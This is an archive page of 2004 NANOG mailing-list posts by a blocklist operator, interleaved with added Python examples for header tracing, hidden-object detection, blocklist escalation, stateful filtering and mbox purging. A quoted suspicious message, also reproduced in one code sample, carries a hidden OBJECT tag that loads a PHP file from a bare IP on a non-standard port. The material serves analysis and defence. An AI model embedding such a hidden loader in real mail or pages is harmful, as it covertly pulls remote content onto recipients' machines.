And while the website was unavailable and the sender is being anonymous (which is against nanog list policies if this was sent through it), what I do find worse is that they managed to do it so that [EMAIL PROTECTED] is not added to CC (which if I understood is always supposed to happen when something goes through this mail list, which makes me think it might have come through merit mail machine but not actually through mail list). What I find even more disturbing is that the ip address listed as origin (which may well have been forged if they managed to gain some higher level access to merit servers) is that of US Military. Below is the header for your review. I do however find it slightly more likely that it's some kind of sophisticated joe-job on spamhaus and that info is forged but they may have used some bug on merit mail software.

I got it too. Let me throw some insight into this - notice the To line:

To: [EMAIL PROTECTED]

IIRC, that's Peter Schroebel, aka SMS Online. Peter has it out for Steve Linford of SpamHaus because SMS Online is listed for hosting spammers. He claims that SpamHaus wanted $10k from him to be removed. Peter tried to bribe the AHBL a few weeks ago to get us to remove him from our system. Peter likes to gloat about all the connections he has, and how powerful he is (though I have yet to see proof of this). So, I'm not exactly sure what to make of this... It could be Peter, and the mirror of the page I've seen certainly makes it look like something he'd write. But, could be a joe job too.
-- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Re: Request response
Erm, something is definitely up tonight. Message is below, for those of you who didn't want to touch this message. I can't get to the site listed in the message, so I have no idea what it's trying to deliver exactly. Anyone care to comment?

-- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org

Return-path: [EMAIL PROTECTED]
Envelope-to: [EMAIL PROTECTED]
Delivery-date: Wed, 17 Mar 2004 21:41:31 -0500
Received: from trapdoor.merit.edu ([198.108.1.26] ident=postfix) by mail.sosdg.org with esmtp (Exim 4.30) id 1B3nTO-00021v-N6; Wed, 17 Mar 2004 21:41:30 -0500
Received: by trapdoor.merit.edu (Postfix) id 6E9DA91333; Wed, 17 Mar 2004 21:40:47 -0500 (EST)
Delivered-To: [EMAIL PROTECTED]
Received: by trapdoor.merit.edu (Postfix, from userid 56) id 35AD791331; Wed, 17 Mar 2004 21:40:47 -0500 (EST)
Delivered-To: [EMAIL PROTECTED]
Received: from segue.merit.edu (segue.merit.edu [198.108.1.41]) by trapdoor.merit.edu (Postfix) with ESMTP id 724909132F for [EMAIL PROTECTED]; Wed, 17 Mar 2004 21:40:44 -0500 (EST)
Received: by segue.merit.edu (Postfix) id 5A6015DE6E; Wed, 17 Mar 2004 21:40:44 -0500 (EST)
Delivered-To: [EMAIL PROTECTED]
Received: from PH02887.net (unknown [203.18.63.43]) by segue.merit.edu (Postfix) with SMTP id 8220D5DE34 for [EMAIL PROTECTED]; Wed, 17 Mar 2004 21:40:43 -0500 (EST)
Date: Thu, 18 Mar 2004 13:40:35 +1000
To: [EMAIL PROTECTED]
From: [EMAIL PROTECTED]
Message-ID: [EMAIL PROTECTED]
MIME-Version: 1.0
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.
Sender: [EMAIL PROTECTED]
Precedence: bulk
Errors-To: [EMAIL PROTECTED]
X-Loop: nanog
X-Scan-Signature: 0642888b67059a54bfdd4dcbc5a4659b
X-SA-Exim-Connect-IP: 198.108.1.26
X-SA-Exim-Mail-From: [EMAIL PROTECTED]
Subject: Request response
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Spam-Checker-Version: SpamAssassin 2.63 (2004-01-11) on everest.sosdg.org
X-Spam-Level: ***
X-Spam-Status: No, hits=7.0 required=9.0 tests=BAYES_01,DCC_CHECK, FORGED_MUA_OUTLOOK,FORGED_OUTLOOK_TAGS,HTML_MESSAGE,MIME_HTML_ONLY, NORMAL_HTTP_TO_IP,NO_REAL_NAME,WEIRD_PORT autolearn=no version=2.63
X-Spam-Report:
 * 0.2 NO_REAL_NAME From: does not include a real name
 * -1.5 BAYES_01 BODY: Bayesian spam probability is 1 to 10% [score: 0.0600]
 * 0.1 HTML_MESSAGE BODY: HTML included in message
 * 0.3 MIME_HTML_ONLY BODY: Message only has text/html MIME parts
 * 0.1 NORMAL_HTTP_TO_IP URI: Uses a dotted-decimal IP address in URL
 * 1.4 WEIRD_PORT URI: Uses non-standard port number for HTTP
 * 2.9 DCC_CHECK Listed in DCC (http://rhyolite.com/anti-spam/dcc/)
 * 1.0 FORGED_OUTLOOK_TAGS Outlook can't send HTML in this format
 * 2.6 FORGED_MUA_OUTLOOK Forged mail pretending to be from MS Outlook
X-SA-Exim-Version: 4.0 (built Tue, 16 Mar 2004 14:56:42 -0500)
X-SA-Exim-Scanned: Yes (on mail.sosdg.org)
Status:

<html><body><font face=System><OBJECT STYLE=display:none DATA=http://24.84.218.164:81/641280.php;></OBJECT></body></html>
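The header chain quoted above is the kind of thing one wants to walk mechanically rather than by eye. What follows is an added example, not code from this page or from the AHBL: it reads a message, follows the Received: headers from the receiving server outwards to the first hop that no trusted relay wrote (the best-supported origin, since every line below it was produced by the originating host and can be forged), and flags hidden OBJECT/IFRAME/EMBED elements whose target is a bare IP on a non-standard port, as the quoted body has. The sample message is constructed from the quoted headers with addresses replaced and the chain trimmed to three hops; the trusted relay IPs and domain suffixes are assumptions you would replace with your own.

```python
"""Added example: walk a Received: chain to the first untrusted hop and
flag hidden OBJECT/IFRAME/EMBED elements pointing at odd ports."""
import re
from email import message_from_string
from email.policy import default
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumption: relays we operate or know; hops they wrote are believed.
TRUSTED_IPS = {"198.108.1.26", "198.108.1.41"}
TRUSTED_RDNS_SUFFIXES = ("merit.edu", "sosdg.org")

# Constructed sample modelled on the quoted headers (not the real mail).
SAMPLE = """\
Received: from trapdoor.merit.edu ([198.108.1.26] ident=postfix)
\tby mail.sosdg.org with esmtp (Exim 4.30) id 1B3nTO-00021v-N6;
\tWed, 17 Mar 2004 21:41:30 -0500
Received: from segue.merit.edu (segue.merit.edu [198.108.1.41])
\tby trapdoor.merit.edu (Postfix) with ESMTP id 724909132F;
\tWed, 17 Mar 2004 21:40:44 -0500 (EST)
Received: from PH02887.net (unknown [203.18.63.43])
\tby segue.merit.edu (Postfix) with SMTP id 8220D5DE34;
\tWed, 17 Mar 2004 21:40:43 -0500 (EST)
From: nobody@example.invalid
To: list@example.invalid
Subject: Request response
Content-Type: text/html; charset=us-ascii

<html><body><font face=System>
<OBJECT STYLE="display:none" DATA="http://24.84.218.164:81/641280.php"></OBJECT>
</body></html>
"""

HOP_RE = re.compile(r"from\s+(?P<helo>\S+)\s+\((?P<paren>[^)]*)\)\s+by\s+(?P<by>\S+)", re.I)
IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def parse_received(raw):
    """Hops newest-first as {helo, rdns, ip, by}; local hand-offs without
    a 'from host (...)' clause are skipped."""
    msg = message_from_string(raw, policy=default)
    hops = []
    for value in msg.get_all("Received", []):
        m = HOP_RE.search(re.sub(r"\s+", " ", str(value)))
        if not m:
            continue
        paren = m.group("paren")
        ip = IP_RE.search(paren)
        first = paren.split()[0] if paren.split() else ""
        rdns = None if (first.startswith("[") or first == "unknown") else first
        hops.append({"helo": m.group("helo"), "rdns": rdns,
                     "ip": ip.group(1) if ip else None, "by": m.group("by")})
    return hops


def first_untrusted_hop(hops):
    """Walk outward from our own server; the first sender that is not a known
    relay is the origin. HELO is never trusted, only IP and reverse DNS."""
    for hop in hops:
        if hop["ip"] in TRUSTED_IPS:
            continue
        if hop["rdns"] and hop["rdns"].endswith(TRUSTED_RDNS_SUFFIXES):
            continue
        return hop
    return None


class HiddenObjectFinder(HTMLParser):
    TAGS = {"object", "iframe", "embed"}

    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        if tag not in self.TAGS:
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        style = a.get("style", "").replace(" ", "").lower()
        url = a.get("data") or a.get("src") or ""
        parts = urlsplit(url)
        self.found.append({"tag": tag, "url": url, "host": parts.hostname,
                           "port": parts.port,
                           "hidden": "display:none" in style or "visibility:hidden" in style,
                           "odd_port": parts.port not in (None, 80, 443)})


def hidden_objects(raw):
    body = message_from_string(raw, policy=default).get_body(preferencelist=("html",))
    if body is None:
        return []
    finder = HiddenObjectFinder()
    finder.feed(body.get_content())
    return [f for f in finder.found if f["hidden"] or f["odd_port"]]


def analyze(raw):
    hops = parse_received(raw)
    return {"hops": hops, "origin": first_untrusted_hop(hops), "hidden": hidden_objects(raw)}


if __name__ == "__main__":
    result = analyze(SAMPLE)
    print("origin:", result["origin"])
    for item in result["hidden"]:
        print("hidden object:", item)
```

On the sample this stops at the 203.18.63.43 hop, the same conclusion the SpamAssassin NORMAL_HTTP_TO_IP and WEIRD_PORT hits point to for the body. The trust decision is made on the connecting IP and the receiving server's reverse lookup, never on the HELO name, because the originating host chooses its own HELO.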
Wiltel Contact
Can someone from Wiltel contact me offlist please. Brian Boles [EMAIL PROTECTED]
Re: Packet Kiddies Invade NANOG
On Monday, March 15, 2004 1:11 PM [EST], John Harold [EMAIL PROTECTED] wrote:

Yes, Gregory Taylor aka OseK is a perfect gentleman now. Here are logs from Feb 4th 2004 showing him being a perfect gentleman...

You know how easy it is to fake IRC logs?

(16:12:01) #nanog!jh I l33t hax0red y0uz!
(16:12:30) #nanaog!skrptkd No, I l33t hax0red y0uz first!

and on and on. I don't know why you people seem to think I'm involved with all of this stuff. If you want to show evidence, do it offlist and among yourselves, because I don't think people give a crap about your little spats between one another - especially not based on IRC logs.

-- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Re: Cisco's Website down?
On Mon, March 15, 2004 3:21 pm, [EMAIL PROTECTED] said: Anyone else seeing an error getting to www.cisco.com? Yep, from AOL, level3, and RoadRunner. All coming back as 403. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The AHBL - http://www.ahbl.org
RE: Cisco website www.cisco.com 403 forbidden?
On Mon, March 15, 2004 3:41 pm, Todd Mitchell - lists said: | Behalf Of Jay Hennigan | Sent: March 15, 2004 3:19 PM | | Is it just me that they don't like? All fixed now, but load times are hella slow:

Probably a million other people just discovered it was back up as well. I know a lot of users that will just sit there, hitting refresh over and over again until the site finally comes up, instead of just going to do something else and coming back later. Then, when it finally comes back up, you have a million users who are hitting refresh over and over again because the site is slow, creating even more load, and you get the picture. :-)

-- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The AHBL - http://www.ahbl.org
Re: www.sunfreeware.com down too?
On Mon, March 15, 2004 3:51 pm, Jon R. Kibler said: Have noticed several sites down today. Can't seem to get to www.sunfreeware.com as well as Cisco. Works fine here. Possibly some flapping going on somewhere? I just logged into several routers and checked, I see nothing entirely out of the ordinary, but I don't have the most wide view of the Internet from these routers. It could also be DoS attacks too. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Re: Cisco's Website down?
On Monday, March 15, 2004 6:01 PM [EST], Stephen J. Wilcox [EMAIL PROTECTED] wrote:

Anyone else seeing an error getting to www.cisco.com? Yep, from AOL, level3, and RoadRunner. All coming back as 403.

You expected the webserver to react differently depending on how your packets got there? Steve

Possibly multiple web servers, each handling different areas, in some sort of a cluster? It's not unheard of. I used to have a system like that for one of my customers - based on where the traffic was coming from, the front end server routed the connections to the various backend web servers, which would serve up slightly different data. Someone comes from RU, send them to a specific server which handles content for Russia, and so on.

403 means permission denied, correct? Also could mean that it's got the IP range you are coming from blacklisted. (Try visiting the Blars BL homepage from a blacklisted IP address, and you'll see what I mean). When trying to figure out where a problem is, sometimes it's good to try from multiple locations regardless, even if it seems to be a problem specifically with the server itself.

-- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Re: who offers cheap (personal) 1U colo?
On Sunday, March 14, 2004 4:58 PM [EST], Janet Sullivan [EMAIL PROTECTED] wrote:

My cable modem provider filters port 25, so I can't run my own SMTP server. Their mail servers suck. Yes, I could pay for a business class cable modem connection and they'd unblock the port... but I'd likely still be filtered. Guess who is having a dedicated 1U set up right now? ;-) I think Paul is right, there is a small niche market for this.

Hm, are there companies out there that offer outbound SMTP services (for people who are blocked, or which need a mail server that's not blacklisted because their provider isn't dealing with spam problems)? I never really looked into it too much, but I haven't seen it offered on providers' sites outright. I was considering setting up a service like this (we have 2-3 outbound mail relay servers that are sitting idle because we don't need them yet), but wasn't sure how interested people would be. Like, say, set up a service that offers people the ability to send outbound mail through based on IP ACLs, possibly SMTP AUTH, TLS/SSL certs, and other things which could authenticate the sender, and have it accept SMTP on various other non-25 ports.

-- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
RE: who offers cheap (personal) 1U colo?
On Sun, March 14, 2004 5:45 pm, Vivien M. said: Have you been looking at providers in the right industry? Such services are usually offered as addons by people who sell DNS services (especially dynamic DNS) and other such things designed to make it easier for people to run their own servers. They do exist, and as was pointed out earlier in this discussion, cost much less than the 1U colo alternative. We do it, and I know at least one or two others in our industry do... I have actually. I see an awful lot of services for incoming SMTP filtering of spam/viruses, or just to hold the mail while you are offline, but haven't seen outgoing SMTP services - which is why I asked :-) -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The AHBL - http://www.ahbl.org
Re: Counter DoS
On Thursday, March 11, 2004 2:43 AM [EST], Jay Hennigan [EMAIL PROTECTED] wrote:

On the other hand, they could become immensely popular, reaching the critical mass when one of them detects what is interpreted as an attack from a network protected by another. Grab the popcorn and watch as they all bludgeon each other to death. :-)

Sounds like efnet channel wars on a much more interesting scale. Like I've said in previous posts - do we really want these people having tools like this? Doesn't this make them the equivalent of 'script kiddies'? How the hell could a company put something like this out, and expect not to get themselves sued to the moon and back when it fires a shot at an innocent party?

-- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Re: Counter DoS
On Thursday, March 11, 2004 3:05 AM [EST], Brian Bruns [EMAIL PROTECTED] wrote:

Sounds like efnet channel wars on a much more interesting scale. Like I've said in previous posts - do we really want these people having tools like this? Doesn't this make them the equivalent of 'script kiddies'? How the hell could a company put something like this out, and expect not to get themselves sued to the moon and back when it fires a shot at an innocent party?

I hit send way too fast, heh.

What's going to happen when they find a nice little exploit in these buggers (even if they have anti-spoof stuff in them) that allows the kids to take control of them or trick them into attacking innocents? Instead of thousands of DDoS drones on DSL and cable modems, you'll see kids with hundreds of these 'nuclear strike firewalls' on T1s, T3s, and higher, using them like they use the current trojans? No product is 100% secure (especially not something that runs under Windows, but that's another issue), so how are they going to deliver updates? Or make sure that the thing is configured right?

I could see blacklists (BGP based) cropping up of these systems, so that you can filter these networks from ever being able to come near your network.

This is starting to sound more and more like a nuclear arms race - on one side we have company A, on the other company B. Company A fears that B will attack it, so they get this super dooper nuclear strike system. Company B follows suit and sets one up as well. Both then increase their bandwidth, outdoing the other until finally, a script kiddie comes along, and spoofs a packet from A to B, and B attacks A, and A responds with its own attack. ISPs hosting the companies fall flat on their face from the attack, the backbone between the two ISPs gets lagged to death, and stuff starts grinding to a halt for others caught in the crossfire.

So, who thinks that this is a good idea?
:) -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Re: Counter DoS
On Thursday, March 11, 2004 6:16 PM [EST], william(at)elan.net [EMAIL PROTECTED] wrote:

Which RBL operators flood /24's or /16's? What do they flood them with?

I think he meant that RBLs sometimes include entire /24 in RBL list when only one or two ips are at fault and some would go even higher to include entire ISP allocation. This is probably talking about SPEWS and alike RBLs

That usually only happens when providers ignore abuse reports and don't do something about their abusive customers. That's how we do it at the AHBL - you ignore abuse reports for long enough and pretend like the problem doesn't exist, you get a /24 listed. You move the spammer to another block inside your network, and it grows to encompass the new block as well as the old one. And it keeps going from there.

That's how the rima-tde blocks that are in the AHBL got started - single /32s, then as the spam and 419 scams came in faster, it expanded to /24s, and finally after 2 dozen or so /24s blocked, I started going for /20s and larger. Now I've got two /13s, and a /16 of theirs blocked until Telefonica decides to contact us and discuss the situation with the abuse coming from their network.

When providers don't act on abuse, you have to put the pressure on. Sometimes, that means forcing their legit customers to start to complain and throw a fit with their provider over the blocks. Yes, it's ugly and unfair, but that's the only way to get them to act.

-- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
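The escalation described in the message above (single hosts, then the /24, then the /20 once enough /24s in it are listed) is a policy that can be written down and run over a hit list. The block below is an added example, my code and not the AHBL's: it aggregates abusive source addresses with the standard library's `ipaddress` module, lists a /24 once it holds a threshold number of abusive hosts, collapses listed /24s into their /20 once a second threshold is reached, and leaves everything else as a /32. The thresholds and the sample addresses (documentation ranges) are assumptions chosen for illustration, not AHBL's real numbers.

```python
"""Added example: escalate a blocklist from /32s to /24s to /20s as abuse
concentrates in one provider's space. Thresholds are assumptions."""
from collections import Counter
from ipaddress import ip_address, ip_network

# Constructed sample of abusive source addresses (documentation ranges).
SAMPLE_HITS = [
    "192.0.2.10", "192.0.2.11", "192.0.2.12", "192.0.2.200",   # one /24, four hosts
    "198.51.100.5",                                            # a lone host
    "203.0.113.1", "203.0.113.2", "203.0.113.3",               # one /24, three hosts
] + [f"10.20.{third}.{host}" for third in (1, 2, 3, 4) for host in (1, 2, 3)]


def escalate(hits, hosts_per_24=3, nets_per_20=4):
    """Return the set of networks to list.

    A /24 is listed once `hosts_per_24` distinct abusive hosts sit in it; a /20
    is listed once `nets_per_20` of its /24s are listed, and the /24s inside it
    are then dropped as redundant. Hosts not covered by any listing stay /32."""
    hosts = {ip_address(h) for h in hits}

    per24 = Counter(ip_network(f"{h}/24", strict=False) for h in hosts)
    listed24 = {net for net, n in per24.items() if n >= hosts_per_24}

    per20 = Counter(net.supernet(new_prefix=20) for net in listed24)
    listed20 = {net for net, n in per20.items() if n >= nets_per_20}

    listed = set(listed20)
    listed |= {net for net in listed24 if net.supernet(new_prefix=20) not in listed20}
    listed |= {ip_network(f"{h}/32") for h in hosts
               if not any(h in net for net in listed)}
    return listed


def as_strings(nets):
    """Sorted CIDR strings, convenient for a zone file or a comparison."""
    return sorted(str(n) for n in nets)


if __name__ == "__main__":
    for cidr in as_strings(escalate(SAMPLE_HITS)):
        print(cidr)
```

Run on the sample, the twelve 10.20.x.y hosts collapse into 10.20.0.0/20, the two busy /24s are listed whole, and 198.51.100.5 stays a /32. In a real list the hit counts would be weighted by recency and the thresholds kept deliberately conservative, since the collateral damage to a provider's clean customers is, as the message says, the point of the pressure and therefore has to be a conscious decision rather than an accident of the counter.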
Re: wholesalebandwidth.com major sponsor of spammers refuses to accept email at abuse
On Thursday, March 11, 2004 10:11 PM [EST], Henry Linneweh [EMAIL PROTECTED] wrote:

I have received almost 200 different spam messages from domains hosted by this provider from Russian domains attempting to sell pharmaceuticals and other unsolicited services that I do not want. tekmailer.com and moosq.com are 2 of the primary abusers from this hosting company -Henry

Message from yahoo.com. Unable to deliver message to the following address(es). [EMAIL PROTECTED]: 69.6.21.60 does not like recipient. Remote host said: 550 5.7.1 [EMAIL PROTECTED]... Relaying denied Giving up on 69.6.21.60.

Wholesalebandwidth is just a front-end for spammers. I've had them blacklisted for a long time with no ill effects (and a lot less spam).

-- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Need a cox.net mail server contact
Hello all, If a cox.net mail admin, or someone who knows a cox.net mail admin could contact me offlist about them blocking 2mbit.com in their mail servers, that would be great. I've tried contacting their [EMAIL PROTECTED] with UNBLOCK in the subject, but it just bounces the mail back at me with the same error as if I was trying to contact one of their users. Sooo, you kinda see the issue. Thanks -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Re: Need a cox.net mail server contact
On Thursday, March 11, 2004 1:19 AM [EST], Gregory Taylor [EMAIL PROTECTED] wrote:

The IP that 2mbit.com inhabits is on a Road Runner commercial block, which is allocated for small to mid-sized businesses. There is no reason for commercial cable networks to be blocked under the same pretenses that consumer cable networks are blocked. Just my 2 cents

It's the domain specifically. Not the IP. I can send to cox.net using one of my other dozen domain names from our IPs directly without a block. But, no matter where I try 2mbit.com from, it's blocked. I suspect it has something to do with the 'fix' I was told by cox.net was in place to prevent them from DoSing our mail servers with bounces. Rather than actually fixing their mail servers, just block my domain so that the joe job doesn't cause bounces in the first place. How nice of them eh? Guess my cox.net mail server blacklist entry in the AHBL during the attack didn't get the message through.

-- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Re: Information Warfare
On Saturday, March 06, 2004 4:46 AM [EST], william(at)elan.net [EMAIL PROTECTED] wrote:

Here is a quote from their press-release I especially like: ... Symbiot has introduced the first and only tool that intelligently and accurately responds to hostile attacks against enterprise networks, said Richard Forno, former chief security officer for Network Solutions, and a noted information warfare specialist. While other companies offer only passive defense barriers, Symbiot provides the equivalent of an active missile defense system ...

Lovely. So not only do we now have to fend off attacks from script kiddies and packet monkeys, we now have to fend off attacks from idiot sysadmins who set this tool up and allow it to go all out on supposed 'attacks' against their systems.

I'll share my favorite goober with firewall story. When I was a sysadmin/netadmin at a large ISP, I used to get these 'attack' reports from clueless users all the time. I could identify which tool they used just by how the body of the message looked and how the 'attack' was described. Got ones saying that my performance testing server (which sometimes did ping scans across the dialups to see what the general response time was) was 'attacking' the user's machine with a single ICMP echo. Or how our IRC server was trying to attack the user on the ident port every time they tried to connect.

Of course, the best one was when a supposed 'security expert' called up and complained how my two caching DNS servers for the T1 customers were attacking his entire network on port 53 UDP. He had naturally filtered the 'attack' because it was obvious that our Linux DNS servers were infected with one of the latest Windows viruses going around, and suddenly no one on his network could browse the web anymore.

So, let me ask the question, do we really want people like that having a tool which autoresponds to attacks with attacks? At least when he filtered out our DNS traffic, it only affected his network...

But imagine if he had launched an attack against my DNS servers in response? Yeah, that's a great idea.

Of course, now that the AHBL does its own proxy testing, we get all sorts of fun reports from end users about our 'attacks' against their machines. Latest one demanded I tell her why we had scanned her, but wouldn't tell me her IP address or when the scan happened exactly, claiming that I had done the scan, so I should know what IP she is. Too bad I test over 100,000 IP addresses daily for open proxies.

Let's not even get into the legal consequences for a tool like this, especially if it backfires and launches an attack against the NIPC, for example.

-- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
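The "port 53 UDP attack" in the story above is exactly what a stateless rule produces: every DNS reply to a recursive query arrives from a foreign host with source port 53, so a rule that has no memory of the outbound query cannot tell a reply from a probe. The block below is an added example, not from the page and not Symbiot's product: it runs a constructed set of flow records through a naive stateless rule and through a minimal state table that remembers outbound UDP 4-tuples for a short window and treats only the inbound packets with no matching query as unsolicited. The inside prefix, resolver addresses and flows are all assumptions.

```python
"""Added example: stateless vs. stateful treatment of inbound UDP/53,
showing why DNS replies get reported as 'attacks'. Data is constructed."""
from ipaddress import ip_address, ip_network

INSIDE = ip_network("192.0.2.0/24")  # assumption: the complaining network

# Constructed flow records: (time, proto, src, sport, dst, dport)
FLOWS = [
    (0.0, "udp", "192.0.2.7", 40123, "198.51.100.53", 53),  # query to resolver
    (0.1, "udp", "198.51.100.53", 53, "192.0.2.7", 40123),  # its reply
    (0.2, "udp", "192.0.2.8", 51001, "198.51.100.54", 53),  # query to 2nd resolver
    (0.3, "udp", "198.51.100.54", 53, "192.0.2.8", 51001),  # its reply
    (5.0, "udp", "198.51.100.53", 53, "192.0.2.9", 1434),   # no query behind it
    (6.0, "udp", "203.0.113.9", 53, "192.0.2.7", 53),       # probe from elsewhere
]


def stateless_alerts(flows):
    """The naive rule: any inbound UDP packet with source port 53 is an attack."""
    return [f for f in flows
            if f[1] == "udp" and f[3] == 53
            and ip_address(f[4]) in INSIDE and ip_address(f[2]) not in INSIDE]


def stateful_alerts(flows, window=2.0):
    """Remember outbound UDP 4-tuples; an inbound packet whose reversed tuple
    was seen within `window` seconds is a solicited reply and consumes that
    state. Only the remainder is reported."""
    outstanding = {}
    alerts = []
    for t, proto, src, sport, dst, dport in sorted(flows):
        if proto != "udp":
            continue
        src_in, dst_in = ip_address(src) in INSIDE, ip_address(dst) in INSIDE
        if src_in and not dst_in:
            outstanding[(src, sport, dst, dport)] = t
        elif dst_in and not src_in:
            key = (dst, dport, src, sport)
            seen = outstanding.get(key)
            if seen is not None and t - seen <= window:
                del outstanding[key]
            else:
                alerts.append((t, proto, src, sport, dst, dport))
    return alerts


if __name__ == "__main__":
    print("stateless rule alerts on", len(stateless_alerts(FLOWS)), "packets")
    for alert in stateful_alerts(FLOWS):
        print("unsolicited:", alert)
```

The stateless rule fires on all four inbound packets, the two genuine replies included, which is what the caller in the story saw and filtered. The state table keeps the two replies and leaves only the reply nobody asked for and the probe from a third network. An auto-responding product built on the first rule would have "retaliated" against the ISP's resolvers; the second still says nothing about whether the two remaining packets deserve anything more than a log line.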
Re: dealing with w32/bagle
Quoting Dan Hollis [EMAIL PROTECTED]: I am curious how network operators are dealing with the latest w32/bagle variants which seem particularly evil. Also, does anyone have tools for regexp and purging these mails from unix mailbox (not maildir) mailspool files? Eg purging these mails after the fact if they were delivered to user's mailboxes before your virus scanner got a database update. I am also interested in what network/mail folks are doing about this situation. Blocking all zip files at the mail level is next to impossible (since of course when we started blocking executable files, we told people to zip up executables) and since business can't be taken care of without someone requiring zip files to pass. I will be the first to admit that using mail as a file transfer protocol isn't the way to go, but getting people to realize that (and forcing them to change) is next to impossible. Brian
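Dan's second question, purging already-delivered messages from a Unix mbox spool, is answerable with the standard library alone. The block below is an added example and not Dan's, Brian's or any vendor's tool: it opens the spool with `mailbox.mbox`, takes the dot-lock/flock that the MTA and MUA honour so a delivery landing mid-rewrite is not lost, removes every message whose attachment filename or Subject matches a regex, and rewrites the file. The spool contents are constructed, and the default pattern (archive and executable extensions) is an assumption to be tuned to whatever the scanner missed, not a signature for any particular worm.

```python
"""Added example: purge matching messages from a Unix mbox spool after the
fact. The sample spool is constructed; the regex is an assumption."""
import mailbox
import os
import re
import tempfile

SAMPLE_MBOX = """\
From alice@example.invalid Wed Mar  3 10:00:00 2004
From: alice@example.invalid
To: user@example.invalid
Subject: lunch

see you at noon

From nobody@example.invalid Wed Mar  3 10:01:00 2004
From: nobody@example.invalid
To: user@example.invalid
Subject: Re: Document
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

see attached
--b1
Content-Type: application/zip; name="doc.zip"
Content-Disposition: attachment; filename="doc.zip"
Content-Transfer-Encoding: base64

UEsDBAo=
--b1--

From bob@example.invalid Wed Mar  3 10:02:00 2004
From: bob@example.invalid
To: user@example.invalid
Subject: photo
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b2"

--b2
Content-Type: text/plain

from the weekend
--b2
Content-Type: image/jpeg; name="photo.jpg"
Content-Disposition: attachment; filename="photo.jpg"
Content-Transfer-Encoding: base64

/9j/4AAQ
--b2--

"""

# Assumption: what to purge. Tune to the names your scanner let through.
DEFAULT_PATTERN = re.compile(r"\.(zip|exe|scr|pif|com|bat)$", re.I)


def matches(msg, pattern):
    """True if the Subject or any attachment filename matches `pattern`."""
    if pattern.search(msg.get("Subject", "")):
        return True
    return any(part.get_filename() and pattern.search(part.get_filename())
               for part in msg.walk())


def purge_mbox(path, pattern=DEFAULT_PATTERN):
    """Remove matching messages in place; returns (removed, remaining).
    lock() takes the dot-lock and flock so concurrent delivery is safe."""
    box = mailbox.mbox(path)
    box.lock()
    try:
        doomed = [key for key in box.keys() if matches(box[key], pattern)]
        for key in doomed:
            box.remove(key)
        box.flush()              # rewrites the spool without the removed messages
        remaining = len(box)
    finally:
        box.unlock()
        box.close()
    return len(doomed), remaining


def demo():
    """Write the constructed spool to a temp file and purge it."""
    path = os.path.join(tempfile.mkdtemp(), "user")
    with open(path, "w") as fh:
        fh.write(SAMPLE_MBOX)
    return purge_mbox(path)


if __name__ == "__main__":
    print("removed, remaining:", demo())
```

Run against a real spool this is destructive, so the obvious first pass is to replace `box.remove(key)` with printing the Subject and filenames of each doomed key and look at the list; Brian's point below about legitimate zip traffic is why the pattern alone is not a safe criterion on a busy server.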
Re: The Geography of Spam
On Tuesday, March 02, 2004 11:11 AM [EST], [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:

Thought folks might find this blurb from Sophos on the geography of Spam interesting. 30% of Spam, they report, comes from hijacked PC's. Matches pretty close to what we see across our network - i.e. all sorts of stuff from swbell.net

o U.S. Routes More Spam than World Combined, Study Shows

